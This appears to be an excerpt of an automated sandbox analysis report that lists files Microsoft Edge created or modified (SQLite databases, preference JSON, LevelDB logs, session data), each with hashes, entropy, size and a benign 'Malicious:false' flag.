                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.111820928550199
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:S85aEFljljljljl7em/lllaV93HS9+qyNRs+dUA5EEE:S+a8ljljljljl7hllcyBQ1H
                                                                                                                                                                                                                                                                                                                  MD5:4D524E847F93E7B28E1201AE556FF67D
                                                                                                                                                                                                                                                                                                                  SHA1:B7F919018D3BE1B221B9930F716C94745660152B
                                                                                                                                                                                                                                                                                                                  SHA-256:D79E5961BBE14700A1519AFCD99B9844099E77BB5D873FCE77C9CCF6C51DCB5B
                                                                                                                                                                                                                                                                                                                  SHA-512:707455E85E686F28DBA56F2826C88F0D29EF3994481B9A0BF565635DDBECA092735A092390FC0DF9185DC5D84395781BCE6EC24F02C363701293E4AC8340B41B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............y_..b................next-map-id.1.Cnamespace-3f73e1a5_92ce_475f_902b_50684866c462-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.210353007672496
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HES39+q2PCHhJ23oH+TcwtrQMxIFUt8YEdwJZmw+YELiw9VkwOCHhJ23oH+Tcwtf:kSN+vBYebCFUt8/dy/+/RV56YebtJ
                                                                                                                                                                                                                                                                                                                  MD5:C5AF2B92F0A02DB4C18C40ECBE29BBC9
                                                                                                                                                                                                                                                                                                                  SHA1:0462457C350A70CBD706519212CD07AEEBC78F87
                                                                                                                                                                                                                                                                                                                  SHA-256:C2AE1E0E972A77C6B155317D21A1E881714D68A89C68CCDBA83A3A2AA4E3AE90
                                                                                                                                                                                                                                                                                                                  SHA-512:F0E7B8084B13F888D4E3A531F4F606A67779F7CFB6DAD890DB5BF41F56F6BD4577F5CF6BADEAD4ADF0285CBBF1AB457D33FB861FAE76C55048D773822203406D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.662 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-09:48:29.664 16bc Recovering log #3.2024/11/21-09:48:29.704 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2521
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8169573186033126
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:38PvO/GTC+GIzFlSLp2FEkCh6WGNWyHOp7vmTISWo1+4f2mAFnFXDHOpZ:3MO/0LGasp2+k66VWyuhmTvZBaFzuP
                                                                                                                                                                                                                                                                                                                  MD5:B70CEDBC0C78E50989481F2E4DC36CDD
                                                                                                                                                                                                                                                                                                                  SHA1:ED0812EDE9114B95112C89EF87E1F88244DD2571
                                                                                                                                                                                                                                                                                                                  SHA-256:36CE733289877F6C6A22A93EDBA29AC9A4907FD9B140E3C3460A8193321595B9
                                                                                                                                                                                                                                                                                                                  SHA-512:1E3DC99EEAEE3C734D20DAEBFF3F64AB3D0B26A0D10805E6AB50050BD45395822D1D94FBF49CFDA26B100342C8A341AE0FF64E80D0A52078885B129E3CDBD948
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SNSS..........~..............~......"...~..............~..........~..........~..........~....!.....~..................................~...~1..,......~$...3f73e1a5_92ce_475f_902b_50684866c462......~..........~......\...........~......~..........................~....................5..0......~&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}........~..........~.............................~..............~........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........f5\m'...f5\m'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.140492825094368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEZyjIq2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YEdRXZmw+YEdRFkwOCHhJ23oH+TcwK:kcIvBYebIhHh2FUt8/T/+/J56YebIhHd
                                                                                                                                                                                                                                                                                                                  MD5:12268430013C14A9EAF8B5EF5A40FEF5
                                                                                                                                                                                                                                                                                                                  SHA1:5D38C25BB7744C4F6E2D633BF14929EAB283D965
                                                                                                                                                                                                                                                                                                                  SHA-256:37BB6B258A62D2474BC1B4EC2747106B1CA34F7458CEC10C1E511C344E010D4D
                                                                                                                                                                                                                                                                                                                  SHA-512:BC5F7404CE4D48B6964E104F046537D30E6B4A321AEE37619B77BED500A221BFD61B602331EFC6319DFFCF34158B2AA61679866E38907B35F4840D10DBD20AC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.790 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-09:48:28.791 1ac4 Recovering log #3.2024/11/21-09:48:28.791 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.244464658380144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:k+R4vBYebvqBQFUt8/5J/+/UUCD56YebvqBvJ:k1BYebvZg8/Yg6Yebvk
                                                                                                                                                                                                                                                                                                                  MD5:BC6C9405773456BA576FA0E68856B476
                                                                                                                                                                                                                                                                                                                  SHA1:AE3D7C0DC48FCFD6BFE60A871B99C2B99BFE99EE
                                                                                                                                                                                                                                                                                                                  SHA-256:57F3276EA8262CE881B7B3548C0AF206BBADAD5865D16F75E0DDC63B24FF1CAF
                                                                                                                                                                                                                                                                                                                  SHA-512:3075A14B1C123D93E182336BBA3462324CD8180A65834080EED919F1FB3E2911442F1FABE69063ADC35A99AC83EA6289CEAF72C646564017D77D50DBC8A035FC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.738 1c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c20 Recovering log #3.2024/11/21-09:48:29.787 1c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2963717764791545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kx+vBYebvqBZFUt8/EDG/+/EqV56YebvqBaJ:kGBYebvyg8/Ent6YebvL
                                                                                                                                                                                                                                                                                                                  MD5:937688FD53EA7CF98913E9AD81793301
                                                                                                                                                                                                                                                                                                                  SHA1:00536C86D591DD4175A76CB7EEBB79E4D1354427
                                                                                                                                                                                                                                                                                                                  SHA-256:71D618440F1E11532C8CA3D498AE469E4334D4BC9A46E8A7980345FF4718F073
                                                                                                                                                                                                                                                                                                                  SHA-512:612E7BD4343D3CE3681C8F77AE3EBAFCFD04ABF263A777A06653E75A95EBB2D70A120722136EDC221D7F5DA399049A84CB3851765213020248C7272B852DEBEC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:46.576 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/21-09:48:46.583 16bc Recovering log #3.2024/11/21-09:48:46.587 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.240575720104754
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEs3+q2PCHhJ23oH+TcwtpIFUt8YEsXZmw+YEFtVkwOCHhJ23oH+Tcwta/WLJ:kdvBYebmFUt8/4/+/FT56YebaUJ
                                                                                                                                                                                                                                                                                                                  MD5:11B95E90399957EC7E7A016F6A5F40B6
                                                                                                                                                                                                                                                                                                                  SHA1:160B138BC62F4B25AE5CCFD5033C91281F57DAC7
                                                                                                                                                                                                                                                                                                                  SHA-256:0830860D98D274763B58903F6B354DF543E584FC17E77F8B52018BC033179A60
                                                                                                                                                                                                                                                                                                                  SHA-512:F3CA311C84E63CBC529045630F0643DC4B43CFFE340399E85C1C1CA3EA2F9EDCFC477D254992BFD44B29A63FFC2D594B9C6E44E0CA13A4526A12D05FC999CD02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.799 1498 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-09:48:28.799 1498 Recovering log #3.2024/11/21-09:48:28.800 1498 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2650118817842442
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KrJ/2qOB1nxCkMTSAELyKOMq+8QTQKC+CVum9:K0q+n0JT9ELyKOMq+8Q7K
                                                                                                                                                                                                                                                                                                                  MD5:DF83F659F3720BBAFAC1A4B03AF9BD9E
                                                                                                                                                                                                                                                                                                                  SHA1:AF9009341AE5840DE26E744F35D3E77499CB2701
                                                                                                                                                                                                                                                                                                                  SHA-256:256E9903D62C39069C93AE6871D9BE84354D638E8835A1E8619C14FEF933F9E0
                                                                                                                                                                                                                                                                                                                  SHA-512:057A1C2CF2AE715641234D1B7BF7FDB35B144DE228301DDDA17070C8A1BEAB3CBB791A2F7271E5F5D12E513AD4346C6716EE41D62296B8B2F6B657D89F630899
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4660891740727344
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBgs:v7doKsKuKZKlZNmu46yjxX
                                                                                                                                                                                                                                                                                                                  MD5:91DE9823F00D6D0ED42C4EBCA3FB556B
                                                                                                                                                                                                                                                                                                                  SHA1:392C44416546B6EC6274E3BAEA68B402DA321227
                                                                                                                                                                                                                                                                                                                  SHA-256:4AF19E3736EF143304F7E627E910C0868D2C538E53264F40E66F30BBC24F6972
                                                                                                                                                                                                                                                                                                                  SHA-512:DF296DC55643190E776788FBFCD0EB05254A3D6134B4612D24C435E351AEE7D6DD408CA15FCE1F54A769D96D624EAD74DF420D49C456C5452BFBE165A3459E67
                                                                                                                                                                                                                                                                                                                  Malicious:false
